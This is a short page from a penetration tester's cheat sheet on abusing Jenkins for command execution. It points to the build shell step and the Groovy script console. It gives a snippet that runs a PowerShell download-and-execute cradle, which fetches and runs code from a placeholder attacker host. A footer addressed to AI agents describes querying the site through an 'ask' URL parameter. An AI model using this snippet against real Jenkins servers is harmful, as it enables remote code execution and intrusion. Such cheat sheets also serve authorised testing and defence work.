# Jenkins

> Jenkins is a free and open source automation server. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Jenkins_\(software\))

## Command execution

1. Create new project
2. Build -> execute shell

or

1. Manage jenkins
2. Script console

```groovy
cmd = """ powershell "IEX(NewObject Net.WebClient).downloadString('http://<ip>/file')" """
println cmd.execute().text
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/services/misc/jenkins.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
